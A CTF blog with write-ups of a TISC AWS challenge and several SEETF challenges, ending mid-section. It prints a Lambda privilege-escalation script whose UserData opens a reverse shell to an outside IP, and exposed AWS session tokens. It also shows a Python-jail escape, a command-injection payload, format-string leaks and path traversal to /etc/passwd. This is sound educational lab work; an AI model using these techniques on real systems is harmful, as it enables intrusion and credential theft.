tJhZufNEPB427FR%2FkAEQtgHXPaDmjNrX8%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20220909T100017Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAUJQ4O7LP6M2EGZJY%2F20220909%2Fap-southeast-1%2Fs3%2Faws4_request&X-Amz-Signature=6d5a839f51be92fcdb385485ae8cb64dd6b02fb8dd92fac6296b81ce1899024d"}}                                                                                                                                                                        
┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$

View File

┌──(kali㉿kali)-[/tmp]
└─$ wget "https://awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com/snapshots/051751498533/cat-service-f02e065f-3e98-4c04-8d77-c627d6d8d5a2?versionId=XMHQ4OlZGN52Y_FiI23NgMfVyC2eL_sD&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEKn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgVPWDaYHJlMRuv68%2F2KU7CnITmi1VfjUFYA%2FNOKdyXJwCIGttcU4mQ3yG6heLPsf68OxVG%2Be%2B3XgadfsmNxjqHhtnKtsECEIQBBoMMjk1MzM4NzAzNTgzIgybdHXD%2BdW7I4bBzosquATyJkvl9EBzjY3gRW8PYnOx9Hx%2FhkP%2FtcoKs8V960UbbTm%2FvdM9uHGqRPQOymRA5rV8Mn4ab7kOLwmkoj8idhSYVqxmrmVQMw%2F38rknTmhjctVxiBTtySxajN1Lk3OcN%2FTNTPp084PwrztLu6J69MpcbtU5We0yUCR%2BimmbMQ3UZE1KrqMCMZf%2Ffw9PIuaUpb25wB58U%2BusFKNDESVGnasMuLCaSkoV4PQhvJbqTnt4Mj1QMLG25J5gyks5CejdxvWN5GEEFIZkAUkhXLO24IqBeNg3D28x7ndGmYDdtH93rdqichuColz0tZCjJHdVd2T2R3ympa54LVeqWi1p1pwF%2BIt%2BEd%2BOV3bsDFIR%2FOKcd8HQd9TvOtsh6mAijX0vzOMoIP0gZbzvOHHfrE1Cl4pLtw3kBWki5Zj72nea2%2FwLGYslN2Y1Wu1IDk1%2FuONb4%2FJxoxG2AbHJw7a0nTAWByfRp43K7641WZogJK9kiOG%2FIFaXkbR0gTFLngLGHz8GLjBoFyHDaklBChdB60OpejmYgZnCTPRIyBsSR7i3%2BPsydGzMI8QzsLD2W2qSWt2C6N0kWwqeyyzvu6EYio1l2YEmHtQa14y0U6Dz7wNFN0VLnKVvAgK22cktfZbm11bPG%2FAyjUKRcBqUVaZyBl6b9JgKGdKwevmJzYI%2FsAN5oxtDwvO%2FiRLFVeVV2XflxqVLw9wqPr%2BnF3yw%2FTzUdtbTadkGsDDfeGe8iX3TNnbcCpiTAB4VFKyk8sDHMOeI7JgGOqoB943K6qC1kUngqxMXWO%2BXUDiyHh15Q3jaJiWbtJpRrT08fxIT%2BWxZauF5fuL1NEEIOu%2FBMnbbvV5JfOys0RLJ87PcsZ%2B9K7gDECtZyLobJvtCbjyulcVgQQSdiiojrqDhWGFxrHKUmbddgLTfWpP0PR%2BWPVBrFzZ9m66avkdzCgoomtKHtVZCbEGl1nv9Sab6NytJhZufNEPB427FR%2FkAEQtgHXPaDmjNrX8%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20220909T100017Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAUJQ4O7LP6M2EGZJY%2F20220909%2Fap-southeast-1%2Fs3%2Faws4_request&X-Amz-Signature=6d5a839f51be92fcdb385485ae8cb64dd6b02fb8dd92fac6296b81ce1899024d" -O special.zip
--2022-09-09 06:02:09--  https://awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com/snapshots/051751498533/cat-service-f02e065f-3e98-4c04-8d77-c627d6d8d5a2?versionId=XMHQ4OlZGN52Y_FiI23NgMfVyC2eL_sD&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEKn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgVPWDaYHJlMRuv68%2F2KU7CnITmi1VfjUFYA%2FNOKdyXJwCIGttcU4mQ3yG6heLPsf68OxVG%2Be%2B3XgadfsmNxjqHhtnKtsECEIQBBoMMjk1MzM4NzAzNTgzIgybdHXD%2BdW7I4bBzosquATyJkvl9EBzjY3gRW8PYnOx9Hx%2FhkP%2FtcoKs8V960UbbTm%2FvdM9uHGqRPQOymRA5rV8Mn4ab7kOLwmkoj8idhSYVqxmrmVQMw%2F38rknTmhjctVxiBTtySxajN1Lk3OcN%2FTNTPp084PwrztLu6J69MpcbtU5We0yUCR%2BimmbMQ3UZE1KrqMCMZf%2Ffw9PIuaUpb25wB58U%2BusFKNDESVGnasMuLCaSkoV4PQhvJbqTnt4Mj1QMLG25J5gyks5CejdxvWN5GEEFIZkAUkhXLO24IqBeNg3D28x7ndGmYDdtH93rdqichuColz0tZCjJHdVd2T2R3ympa54LVeqWi1p1pwF%2BIt%2BEd%2BOV3bsDFIR%2FOKcd8HQd9TvOtsh6mAijX0vzOMoIP0gZbzvOHHfrE1Cl4pLtw3kBWki5Zj72nea2%2FwLGYslN2Y1Wu1IDk1%2FuONb4%2FJxoxG2AbHJw7a0nTAWByfRp43K7641WZogJK9kiOG%2FIFaXkbR0gTFLngLGHz8GLjBoFyHDaklBChdB60OpejmYgZnCTPRIyBsSR7i3%2BPsydGzMI8QzsLD2W2qSWt2C6N0kWwqeyyzvu6EYio1l2YEmHtQa14y0U6Dz7wNFN0VLnKVvAgK22cktfZbm11bPG%2FAyjUKRcBqUVaZyBl6b9JgKGdKwevmJzYI%2FsAN5oxtDwvO%2FiRLFVeVV2XflxqVLw9wqPr%2BnF3yw%2FTzUdtbTadkGsDDfeGe8iX3TNnbcCpiTAB4VFKyk8sDHMOeI7JgGOqoB943K6qC1kUngqxMXWO%2BXUDiyHh15Q3jaJiWbtJpRrT08fxIT%2BWxZauF5fuL1NEEIOu%2FBMnbbvV5JfOys0RLJ87PcsZ%2B9K7gDECtZyLobJvtCbjyulcVgQQSdiiojrqDhWGFxrHKUmbddgLTfWpP0PR%2BWPVBrFzZ9m66avkdzCgoomtKHtVZCbEGl1nv9Sab6NytJhZufNEPB427FR%2FkAEQtgHXPaDmjNrX8%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20220909T100017Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAUJQ4O7LP6M2EGZJY%2F20220909%2Fap-southeast-1%2Fs3%2Faws4_request&X-Amz-Signature=6d5a839f51be92fcdb385485ae8cb64dd6b02fb8dd92fac6296b81ce1899024d
Resolving awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com (awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com)... 52.219.37.35
Connecting to awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com (awslambda-ap-se-1-tasks.s3.ap-southeast-1.amazonaws.com)|52.219.37.35|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 416 [application/zip]
Saving to: ‘special.zip’

special.zip                               100%[=====================================================================================>]     416  --.-KB/s    in 0.001s  

2022-09-09 06:02:09 (635 KB/s) - ‘special.zip’ saved [416/416]


┌──(kali㉿kali)-[/tmp]
└─$ dtrx special.zip        
special.zip contains one file but its name doesn't match.
 Expected: special
   Actual: main.py
You can:
 * extract the file _I_nside a new directory named special
 * extract the file and _R_ename it special
 * extract the file _H_ere
What do you want to do?  (I/r/h) 

┌──(kali㉿kali)-[/tmp]
└─$ cd special 

┌──(kali㉿kali)-[/tmp/special]
└─$ ls
main.py

┌──(kali㉿kali)-[/tmp/special]
└─$ cat main.py                        
import boto3

def lambda_handler(event, context):

    # Work in Progress: Requires help from Agents! 

    # ec2 = boto3.resource('ec2')

    # instances = ec2.create_instances(
    #    ImageId="???",
    #    MinCount=1,
    #    MaxCount=1,
    #    InstanceType="t2.micro"
    #)

    return {
        'status': 200,
        'results': 'This is work in progress. Agents, palindrome needs your help to complete the workflow! :3'
    }

┌──(kali㉿kali)-[/tmp/special]
└─$

AWS EC2

Lambda Privesc to EC2 agent role

Find a random Amazon Machine Image. Make sure to find one from the specific region

I made a program to launch an EC2 instance, and through the UserData Parameter, create a reverse shell connection to the attacker.

lambda_function.py

import boto3

# https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
USERNAME="user-95abe82de2174edb98135e48ef896bbd"
SCRIPT=f"""#!/bin/bash
/bin/bash -i >& /dev/tcp/18.141.129.246/16058 0>&1
"""

ROLE="arn:aws:iam::051751498533:role/ec2_agent_role"
REGION_NAME="ap-southeast-1"
def lambda_handler(event, context):
    ec2 = boto3.resource('ec2', region_name=REGION_NAME)

    # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.ServiceResource.create_instances
    # https://codeflex.co/boto3-create-ec2-with-tags/
    instances = ec2.create_instances(
        ImageId="ami-0b89f7b3f054b957e", # Found on AWS Portal
        MinCount=1,
        MaxCount=1,
        InstanceType="t2.micro",
        SubnetId = 'subnet-0aa6ecdf900166741', 
        IamInstanceProfile={
            'Arn': 'arn:aws:iam::051751498533:instance-profile/ec2_agent_instance_profile'
        },
        TagSpecifications=[
            {
                'ResourceType': 'instance',
                'Tags': [
                    {
                        'Key': 'agent',
                        'Value': USERNAME
                    },
                ]
            }
        ],
        UserData=SCRIPT
    )
    instance = instances[0]
    return (instance.id, instance.private_ip_address)

#lambda_handler(None, None)

./run.sh

#https://linuxhint.com/generate-random-string-bash/
LAMBDA_FUNC=user-95abe82de2174edb98135e48ef896bbd-ec2run-$(openssl rand -hex 5)

pip install --target ./package boto3
cd package
zip -r ../function.zip . > /dev/null
cd ..
zip -g function.zip lambda_function.py
rm -rf package

aws lambda create-function --zip-file fileb://function.zip --runtime python3.7 --handler lambda_function.lambda_handler --role arn:aws:iam::051751498533:role/lambda_agent_development_role --function-name $LAMBDA_FUNC --timeout 60
aws lambda invoke --function-name $LAMBDA_FUNC /tmp/out.txt
cat /tmp/out.txt

Running the exploit

┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$ ls
lambda_function.py  run.sh

┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$ ./run.sh
updating: lambda_function.py (deflated 48%)
{
    "FunctionName": "user-95abe82de2174edb98135e48ef896bbd-ec2run-e9bf31c3b2",
    "FunctionArn": "arn:aws:lambda:ap-southeast-1:051751498533:function:user-95abe82de2174edb98135e48ef896bbd-ec2run-e9bf31c3b2",
    "Runtime": "python3.7",
    "Role": "arn:aws:iam::051751498533:role/lambda_agent_development_role",
    "Handler": "lambda_function.lambda_handler",
    "CodeSize": 9332416,
    "Description": "",
    "Timeout": 60,
    "MemorySize": 128,
    "LastModified": "2022-09-09T13:17:26.523+0000",
    "CodeSha256": "zf3I7mXTzYZpEjT3J42YJG5IkSRrjla3zq4gDHOXdmM=",
    "Version": "$LATEST",
    "TracingConfig": {
        "Mode": "PassThrough"
    },
    "RevisionId": "90d3e86c-ef09-46ba-8bcf-d016c6aa5a97",
    "State": "Pending",
    "StateReason": "The function is being created.",
    "StateReasonCode": "Creating",
    "PackageType": "Zip",
    "Architectures": [
        "x86_64"
    ],
    "EphemeralStorage": {
        "Size": 512
    }
}
{
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
}
["i-0647f6b14ee6acc28", "10.0.58.178"]                                                                                                                                                                        
┌──(kali㉿kali)-[/tmp/AWS/lambda/hack-function]
└─$

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 35990
bash: no job control in this shell
[root@ip-10-0-58-178 /]#

AWS DynamoDB

Role Information

The EC2 agent role is shown to have privileges to access DynamoDB.

┌──(kali㉿kali)-[~]
└─$ aws iam list-attached-role-policies --role-name "ec2_agent_role"   
{
    "AttachedPolicies": [
        {
            "PolicyName": "iam_policy_for_ec2_agent_role",
            "PolicyArn": "arn:aws:iam::051751498533:policy/iam_policy_for_ec2_agent_role"
        }
    ]
}

┌──(kali㉿kali)-[~]
└─$ aws iam get-policy --policy-arn "arn:aws:iam::051751498533:policy/iam_policy_for_ec2_agent_role"                       
{
    "Policy": {
        "PolicyName": "iam_policy_for_ec2_agent_role",
        "PolicyId": "ANPAQYDFBGMSUUGDZFFBM",
        "Arn": "arn:aws:iam::051751498533:policy/iam_policy_for_ec2_agent_role",
        "Path": "/",
        "DefaultVersionId": "v1",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "Description": "AWS IAM Policy for EC2 agent node",
        "CreateDate": "2022-07-22T09:29:34+00:00",
        "UpdateDate": "2022-07-22T09:29:34+00:00",
        "Tags": []
    }
}

┌──(kali㉿kali)-[~]
└─$ aws iam get-policy-version --policy-arn "arn:aws:iam::051751498533:policy/iam_policy_for_ec2_agent_role" --version-id "v1"
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "dynamodb:DescribeTable",
                        "dynamodb:ListTables",
                        "dynamodb:Scan",
                        "dynamodb:Query"
                    ],
                    "Effect": "Allow",
                    "Resource": "*",
                    "Sid": "VisualEditor0"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2022-07-22T09:29:34+00:00"
    }
}

┌──(kali㉿kali)-[~]
└─$

Viewing Table

I enumerated through DynamoDB to get the flag.

[root@ip-10-0-47-186 /]# aws dynamodb list-tables --region ap-southeast-1
aws dynamodb list-tables --region ap-southeast-1
{
    "TableNames": [
        "flag_db"
    ]
}
[root@ip-10-0-47-186 /]# aws dynamodb scan --table-name flag_db --region ap-southeast-1                
{
    "Count": 1, 
    "Items": [
        {
            "secret": {
                "S": "TISC{iT3_N0t_s0_C1oUdy}"
            }, 
            "name": {
                "S": "flag"
            }
        }
    ], 
    "ScannedCount": 1, 
    "ConsumedCapacity": null
}
[root@ip-10-0-47-186 /]#

Flag

TISC{iT3_N0t_s0_C1oUdy}

SEEing some Flags in SEETF

Terence Chan Zun Mun — Sun, 14 Aug 2022 16:04:58 +0000

Over the weekend, I participated in the SEETF Capture The Flag Competition. My Team was NYCP, and we ended up doing average (I hope) at 114th place out of 740 teams (560 teams got >200 points)

Overall this was an interesting CTF. Some of the challenges had very interesting concepts, like the Weird Machines one (though I was too lazy and not good enough to solve them). Even the beginner challenges were well thought out, with useful resources included AND applying them in interesting enough ways.

I'll be going through some of the challenges that I focused on. I aim to go through it in detail for any beginners/n00bs (like myself lol). Basic Linux/ Python/ Web Programming knowledge is assumed.

Some of my files are at my Github Repo here

Pwn

I suck at pwn, but it's still fun so I'm still going to keep doing it

"as" "df"

Firstly I tried finding all the global variables using dir(), and there is an interesting variable named blacklist

(base) [hacker@hackerbook ~]$ nc fun.chall.seetf.sg 50002
Hello! Welcome to my amazing Python interpreter!
You can run anything you want, but take not, there's a few blacklists!
Flag is in the root directory, have fun!
Enter command: dir()
Enter command: print(dir())
['__annotations__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'blacklist', 'sys', 'user_input']
Enter command: print(blacklist) 
('eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write', ';', '+', 'ord', 'chr', 'base', 'flag', 'replace', ' ', 'decode', 'join')
Enter command:

I thought, that maybe if I cleared the variable, I could remove the blacklist entirely. This worked, as I could use the import keyword. I imported a library to spawn a bash shell and allow for Remote Code Execution.

(base) [hacker@hackerbook ~]$ nc fun.chall.seetf.sg 50002
Hello! Welcome to my amazing Python interpreter!
You can run anything you want, but take not, there's a few blacklists!
Flag is in the root directory, have fun!
Enter command: blacklist=()
Enter command: import pty; pty.spawn("/bin/bash")
random@app-8575d5795b-mqzr9:~$

I then used this bash shell to find the flag from the root directory, and display its contents using cat

random@app-8575d5795b-mqzr9:~$ cd /
cd /
random@app-8575d5795b-mqzr9:/$ ls
ls
bin   dev  flag  lib    media  opt   root  sbin  sys  usr
boot  etc  home  lib64  mnt    proc  run   srv   tmp  var
random@app-8575d5795b-mqzr9:/$ cat flag
cat flag
SEE{every_ctf_must_have_a_python_jail_challenge_836a4218fb09b4a0ab0412e64de74315}
random@app-8575d5795b-mqzr9:/$

Flag

SEE{every_ctf_must_have_a_python_jail_challenge_836a4218fb09b4a0ab0412e64de74315}

Wayang.py

This is a simple command injection challenge that was satisfying to work through.

These are the contents of wayang.py that were given

#!/usr/local/bin/python
import os

FLAG_FILE = "FLAG"

def get_input() -> int:
    print('''                 ,#####,
                 #_   _#
                 |a` `a|
                 |  u  |            ________________________
                 \  =  /           |        WAYYANG         |
                 |\___/|           <     TERMINAL  v1.0     |
        ___ ____/:     :\____ ___  |________________________|
      .'   `.-===-\   /-===-.`   '.
     /      .-"""""-.-"""""-.      \
    /'             =:=             '\
  .'  ' .:    o   -=:=-   o    :. '  `.
  (.'   /'. '-.....-'-.....-' .'\   '.)
  /' ._/   ".     --:--     ."   \_. '\
 |  .'|      ".  ---:---  ."      |'.  |
 |  : |       |  ---:---  |       | :  |
  \ : |       |_____._____|       | : /
  /   (       |----|------|       )   \
 /... .|      |    |      |      |. ...\
|::::/'' jgs /     |       \     ''\::::|
'""""       /'    .L_      `\       """"'
           /'-.,__/` `\__..-'\
          ;      /     \      ;
          :     /       \     |
          |    /         \.   |
          |`../           |  ,/
          ( _ )           |  _)
          |   |           |   |
          |___|           \___|
          :===|            |==|
           \  /            |__|
           /\/\           /"""`8.__
           |oo|           \__.//___)
           |==|
           \__/''')
    print("What would you like to do today?")
    print("1. Weather")
    print("2. Time")
    print("3. Tiktok of the day")
    print("4. Read straits times")
    print("5. Get flag")
    print("6. Exit")

    choice = int(input(">> "))

    return choice


if __name__ == '__main__':
    choice = get_input()

    if choice == 1:
        print("CLEAR SKIES FOR HANDSOME MEN")
    elif choice == 2:
        print("IT'S ALWAYS SEXY TIME")
    elif choice == 3:
        print("https://www.tiktok.com/@benawad/video/7039054021797252399")
    elif choice == 4:
        filename = input("which news article you want babe :)   ")
        not_allowed = [char for char in FLAG_FILE]

        for char in filename:
            if char in not_allowed:
                print("NICE TRY. WAYYANG SEE YOU!!!!!")
                os.system(f"cat news.txt")
                exit()

        try:
            os.system(f"cat {eval(filename)}")
        except:
            pass
    elif choice == 5:
        print("NOT READY YET. MAYBE AFTER CTF????")

This line in option 4 in particular looks like injection can be done, eiither through eval or command line injection.

eval is a python function that evaluates its argument as python code. In other words, we could potentially custom inject some python code.
eval(filename) is injected into the command through an f-string. This means that I could do a command injection to run Linux Commands.

os.system(f"cat {eval(filename)}")

The variable filename just needs to contain characters which are not in the variable not_allowed. They are FLAG. As such, we are free to use characters like ;, to chain togther linux commands.

My eventual payload decided on was "1+1;cat *".

The quotes are to denote that the input parsed by eval is a python string.
1+1 is just some padding for the cat in f"cat {eval(filename)}" to parse. cat 1+1 would actually result in an error in the linux terminal, but I don't really care if other useless systems crash and burn :)
; is a command delimiter. This means that
cat * displays all the contents of all the files in the directory, where cat shows the contents of file, and * refers to all files in the directory. This would most likely include the flag file.

(base) [hacker@hackerbook ~]$ nc fun.chall.seetf.sg 50008
                 ,#####,
                 #_   _#
                 |a` `a|
                 |  u  |            ________________________
                 \  =  /           |        WAYYANG         |
                 |\___/|           <     TERMINAL  v1.0     |
        ___ ____/:     :\____ ___  |________________________|
      .'   `.-===-\   /-===-.`   '.
     /      .-"""""-.-"""""-.      \
    /'             =:=             '\
  .'  ' .:    o   -=:=-   o    :. '  `.
  (.'   /'. '-.....-'-.....-' .'\   '.)
  /' ._/   ".     --:--     ."   \_. '\
 |  .'|      ".  ---:---  ."      |'.  |
 |  : |       |  ---:---  |       | :  |
  \ : |       |_____._____|       | : /
  /   (       |----|------|       )   \
 /... .|      |    |      |      |. ...\
|::::/'' jgs /     |       \     ''\::::|
'""""       /'    .L_      `\       """"'
           /'-.,__/` `\__..-'\
          ;      /     \      ;
          :     /       \     |
          |    /         \.   |
          |`../           |  ,/
          ( _ )           |  _)
          |   |           |   |
          |___|           \___|
          :===|            |==|
           \  /            |__|
           /\/\           /"""`8.__
           |oo|           \__.//___)
           |==|
           \__/
What would you like to do today?
1. Weather
2. Time
3. Tiktok of the day
4. Read straits times
5. Get flag
6. Exit
>> 4
which news article you want babe :)   "1+1;cat *"
SEE{wayyang_as_a_service_621331e420c46e29cfde50f66ad184cc}WAYYANG DECLARED SEXIEST MAN ALIVE

SINGAPORE - In the latest edition of Mister Universe, Wayyang won again, surprising absolutely no one.
The judges were blown away by his awesome abdominals and stunned by his sublime sexiness.
When asked for his opinions on his latest win, Wayyang said nothing, choosing to smoulder into the distance.# /usr/bin/sh
python wayyang.py#!/usr/local/bin/python
import os

FLAG_FILE = "FLAG"

def get_input() -> int:
    print('''                 ,#####,
                 #_   _#
                 |a` `a|
                 |  u  |            ________________________
                 \  =  /           |        WAYYANG         |
                 |\___/|           <     TERMINAL  v1.0     |
        ___ ____/:     :\____ ___  |________________________|
      .'   `.-===-\   /-===-.`   '.
     /      .-"""""-.-"""""-.      \\
    /'             =:=             '\\
  .'  ' .:    o   -=:=-   o    :. '  `.
  (.'   /'. '-.....-'-.....-' .'\   '.)
  /' ._/   ".     --:--     ."   \_. '\\
 |  .'|      ".  ---:---  ."      |'.  |
 |  : |       |  ---:---  |       | :  |
  \ : |       |_____._____|       | : /
  /   (       |----|------|       )   \\
 /... .|      |    |      |      |. ...\\
|::::/'' jgs /     |       \     ''\::::|
'""""       /'    .L_      `\       """"'
           /'-.,__/` `\__..-'\\
          ;      /     \      ;
          :     /       \     |
          |    /         \.   |
          |`../           |  ,/
          ( _ )           |  _)
          |   |           |   |
          |___|           \___|
          :===|            |==|
           \  /            |__|
           /\/\           /"""`8.__
           |oo|           \__.//___)
           |==|
           \__/''')
    print("What would you like to do today?")
    print("1. Weather")
    print("2. Time")
    print("3. Tiktok of the day")
    print("4. Read straits times")
    print("5. Get flag")
    print("6. Exit")

    choice = int(input(">> "))

    return choice


if __name__ == '__main__':
    choice = get_input()

    if choice == 1:
        print("CLEAR SKIES FOR HANDSOME MEN")
    elif choice == 2:
        print("IT'S ALWAYS SEXY TIME")
    elif choice == 3:
        print("https://www.tiktok.com/@benawad/video/7039054021797252399")
    elif choice == 4:
        filename = input("which news article you want babe :)   ")
        not_allowed = [char for char in FLAG_FILE]

        for char in filename:
            if char in not_allowed:
                print("NICE TRY. WAYYANG SEE YOU!!!!!")
                os.system(f"cat news")
                exit()

        try:
            os.system(f"cat {eval(filename)}")
        except:
            pass
    elif choice == 5:
        print("NOT READY YET. MAYBE AFTER CTF????")
(base) [hacker@hackerbook ~]$

Flag

SEE{wayyang_as_a_service_621331e420c46e29cfde50f66ad184cc}

4mats

Well my writeup while doing the challenge got lost so I had to redo this challenge. Fortunately it was a fun take on the format string vulnerability.

Analysis

I read the source code given in vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

char name[16];
char echo[100];
int number;
int guess;
int set = 0;
char format[64] = {0};


void guess_me(int fav_num){
    printf("Guess my favourite number!\n");
    scanf("%d", &guess);
    if (guess == fav_num){
        printf("Yes! You know me so well!\n");
    system("cat flag");
        exit(0);}
   else{
       printf("Not even close!\n");
   }

}


int main() {

mat1:
    printf("Welcome to SEETF!\n");
    printf("Please enter your name to register: %s\n", name);
    read(0, name, 16);

    printf("Welcome: %s\n", name);

    while(1) {
mat2:
        printf("Let's get to know each other!\n");
        printf("1. Do you know me?\n");
        printf("2. Do I know you?\n");

mat3:
        scanf("%d", &number);


        switch (number)
        {
            case 1:
                srand(time(NULL));
                int fav_num = rand() % 1000000;
        set += 1;
mat4:
                guess_me(fav_num);
                break;

            case 2:
mat5:
                printf("Whats your favourite format of CTFs?\n");
        read(0, format, 64);
                printf("Same! I love \n");
        printf(format);
                printf("too!\n");
                break;

            default:
                printf("I print instructions 4 what\n");
        if (set == 1)
mat6:
                    goto mat1;
        else if (set == 2)
            goto mat2;
        else if (set == 3)
mat7:
                    goto mat3;
        else if (set == 4)
                    goto mat4;
        else if (set == 5)
                    goto mat5;
        else if (set == 6)
                    goto mat6;
        else if (set == 7)
                    goto mat7;
                break;
        }
    }
    return 0;
}

The most interesting things is that there are gotos which we could potentially abuse, some like mat4 even in places where the variables are not initialised properly yet.

Steps

Firstly I increased set to 1

┌──(kali㉿kali)-[~/Documents/Notes/SEETF/username_gen]
└─$ nc fun.chall.seetf.sg 50001
Welcome to SEETF!
Please enter your name to register: 
hacker
Welcome: hacker

Let's get to know each other!
1. Do you know me?
2. Do I know you?
1
Guess my favourite number!
0 
Not even close!

I then displayed the contents on the stack using the format string vulnerability

Let's get to know each other!
1. Do you know me?
2. Do I know you?
2
Whats your favourite format of CTFs?
%x %x %x %x %x %x %x %x %x %x %x %x 
Same! I love 
804a080 40 8048756 1 ffcecec4 ffcececc 85822 f7fbe3dc ffcece30 0 f7e26647 f7fbe000 
too!

I increased the value of set to 2 and viewed the contents on the stack. Noticed that the 7th value cf9e5 is different from the previous 7th value 85822. The only values that changed so far are set = 2 and fav_num. We can hence infer that the 7th value is fav_num

Let's get to know each other!
1. Do you know me?
2. Do I know you?
1
Guess my favourite number!
0
Not even close!
Let's get to know each other!
1. Do you know me?
2. Do I know you?
2
Whats your favourite format of CTFs?

Same! I love 

x 804a080 40 8048756 1 ffcecec4 ffcececc cf9e5 f7fbe3dc ffcece30 0 f7e26647 
too!

I increased the value of set to 3 and then to 4

Let's get to know each other!
1. Do you know me?
2. Do I know you?
1
Guess my favourite number!
0
Not even close!
Let's get to know each other!
1. Do you know me?
2. Do I know you?
1
Guess my favourite number!
0
Not even close!
Let's get to know each other!
1. Do you know me?
2. Do I know you?
2

I displayed the 7th value on the stack in denary.

Whats your favourite format of CTFs?
%7$d
Same! I love 
610084
 804a080 40 8048756 1 ffcecec4 ffcececc 94f24 f7fbe3dc ffcece30 0 
too!

Lastly, i jumped to mat4 by not selecting any of the current options, and entered the fav_num to get the flag

Let's get to know each other!
1. Do you know me?
2. Do I know you?
4
I print instructions 4 what
Guess my favourite number!
610084
Yes! You know me so well!
SEE{4_f0r_4_f0rm4t5_0ebdc2b23c751d965866afe115f309ef}
┌──(kali㉿kali)-[~/Documents/Notes/SEETF/username_gen]
└─$

Flag

SEE{4_f0r_4_f0rm4t5_0ebdc2b23c751d965866afe115f309ef}

Web - Sourceless Guessy Flag

I only managed to solve Sourceless Guessy Web. It was a surprise that I even manage to solve the RCE Flag.

Solution (Baby Flag)

The hint for this challenge is file path traversal. A brief summary of file path traversal (if you haven't read the hint)

Web server code wants to access a local file. In this case is sourcelessguessyweb.chall.seetf.sg:1337/?page=whysoserious
1. the whysoserious is a file that is in the current directory.
In Linux, you can use ../ to traverse up one directory. You can chain multiple of those together to traverse back up multiple directories (eg. ../../../ for 3 directories)
1. You can just spam ../ until you reach root. eg. even though in phpinfo.php the current working directory is /var/www/html, you can theoretically spam 3 or more of ../ to reach the root directory
2. For example, http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../../../../etc/passwd
Once you traverse to the root directory, you can access most files from the root directory, like /etc/passwd
1. This is subject to the user running the web server (eg. www-data running the apache2 web server) has sufficient permissions to access the file
2. This means you can't just anyhow access files which require root access like /etc/shadow. The current user does not have enough permissions
3. Since you can't anyhow access files, most people use this path traversal vulnerability and lead to remote code execution

The standard hacking protocol calls me to access /etc/passwd, as it is able to be read by any user. It is the file that provides the list of users in Linux, along with other details like their home directories.

(base) [hacker@hackerbook ~]$ curl http://sourcelessguessyweb.chall.seetf.sg:1337/?page=../../../etc/passwd

...

    let message = `
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
SEE{2nd_fl4g_n33ds_RCE_g00d_luck_h4x0r}
    `.replace(/[^A-Za-z0-9!?]/g, ' ').trim();

...

Solution (RCE Flag)

Confirming LFI or just Directory Traversal

This is likely overlooked, but there's a difference between Local File Inclusion and Directory Traversal

Local File Inclusion (LFI)	Only Directory Traversal
File is loaded and Executed as code	File is loaded, and only shown as text in the resultant webpage

It's a good idea to confirm that the Directory Traversal vulnerability is actually LFI and can run code. If it can run code, we can use this vulnerability to access custom code and lead to Remote Code Execution. Else, we have to try to leak an important file which allows for RCE, which is unlikely in a Docker Container.

Firstly, on opening the first link from the home page, we are directed to a phpinfo page

I tried traversing to that file to test if code is executed in the vulnerability. If it is not, the text returned should be something like <?php phpinfo();?>, to show the contents of the phpinfo.php file.

